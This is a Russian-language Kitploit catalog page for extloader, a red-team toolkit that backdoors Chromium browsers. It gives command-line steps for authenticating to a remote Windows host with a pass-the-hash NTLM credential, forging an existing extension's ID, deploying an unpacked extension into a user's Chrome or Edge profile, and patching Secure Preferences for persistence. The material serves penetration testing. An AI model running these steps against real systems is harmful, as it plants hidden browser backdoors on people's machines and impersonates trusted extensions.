Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
extloader — Инструментарий для эксплуатации расширений Chromium | Kitploit
Инструменты/GitHubGitHub/synacktiv/extloader
Механизмы персистентностиЭксплуатацияЭксплуатация веб-приложенийСбор информацииПост-эксплуатацияТестирование на ПроникновениеRed Teaming
GitHubsynacktiv/extloader

extloader

Инструментарий для эксплуатации расширений Chromium

Репозиторий
262711 месяцев назадПроверено Kitploit

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

extLoader

Небольшой инструментарий для управления и развертывания распакованных расширений Chromium.

Подробнее в статье: https://www.synacktiv.com/en/publications/the-phantom-extension-backdooring-chrome-through-uncharted-pathways

Установка

Прямая установка (pipx)

root@kitploit:~
pipx install .
extloader --help

Используйте pipx для изолированной установки с Python 3.10+.

Настройка разработки (uv)

root@kitploit:~
uv venv
source .venv/bin/activate
uv pip install -e .

Варианты аутентификации

  • Пароль: -p/--password
  • Хэш: -H/--hash (формат LM:NT или просто NT)
  • Домен: -d/--domain (по умолчанию WORKGROUP)
  • Общие параметры

    • -t, --target: целевой IP/имя хоста
    • -u, --username: имя пользователя
    • -i, --index: индекс пользователя из команды check
    • --debug: включить отладочное логирование

    Использование

    Вот пошаговый пример развертывания расширения:

    1. Сначала проверьте доступные цели:
    root@kitploit:~
    # This will list available users and browsers
    extloader check -t 192.168.1.100 -u admin -H aad3b435b51404eeaad3b435b51404ee:ntlm_hash -d corp.local
    
    ┏━━━━━━━━┳━━━━━━━━━━━━━━━━━┳━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┓
    ┃ Index  ┃ Browser         ┃ User (SID)                                                   ┃
    ┡━━━━━━━━╇━━━━━━━━━━━━━━━━━╇━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┩
    │   1    │ Chrome          │ john.doe (S-1-5-21-4196007090-2879228606-3183820935-1122)    │
    │   2    │ Microsoft Edge  │ john.doe (S-1-5-21-4196007090-2879228606-3183820935-1122)    │
    └────────┴─────────────────┴──────────────────────────────────────────────────────────────┘
    

    При запуске эксплойта на другой машине всегда сначала выполняйте команду check, чтобы обновить контекст (available_targets.json).

    1. Подготовьте манифест (подпишите или подделайте ID):
    root@kitploit:~
    # Create a deterministic crx_id by adding a key to the manifest.json
    extloader sign --extension ./my-extension
    

    Чтобы подделать существующий ID расширения, пропустите указанную выше команду и укажите в манифесте key — base64-публичный ключ расширения, которое вы имитируете. Повторное использование этого ключа сохраняет CRX ID без изменений.

    1. Разверните расширение:
    root@kitploit:~
    # Deploy to user index 1 (Chrome of john.doe)
    extloader exploit -t 192.168.1.100 -u admin -H ntlm_hash -i 1 --extension ./my-extension
    

    4.(Альтернатива) Упакуйте для ручного развертывания:

    root@kitploit:~
    # Bundle the signed extension with the captured Preferences file
    extloader package --prefs-file "Preferences" --extension-dir ./my-extension --target-dir "C:\\Users\\Public"
    
    # This creates a ZIP containing:
    # - Signed extension files
    # - Updated preferences files
    # - Deployment instructions
    

    Параметр --prefs-file ожидает файл предпочтений профиля браузера, который вы сохранили (Chrome/Edge хранят его как Secure Preferences, другие браузеры на Chromium используют Preferences). Загрузчик копирует его, патчит и включает в пакет как изменённую, так и неизменённую версии.

    root@kitploit:~
    ├── extension/
    │   └── chrome-mv3/
    ├── preferences/
    │   ├── brave/
    │   ├── chrome/
    │   ├── chromium/
        [...]
    └── info.json
    
    1. Восстановите исходные предпочтения при необходимости:
    root@kitploit:~
    # Restore original preferences for user index 1 (need check command to get the correct context)
    extloader restore -t 192.168.1.100 -u admin -H ntlm_hash -i 1 -f ./backup_preferences
    

    TODO

    • Поддержка Kerberos
    • модуль nxc
    • Адаптировать workflow package для Linux
    • Адаптировать workflow package для macOS
    Скачать инструмент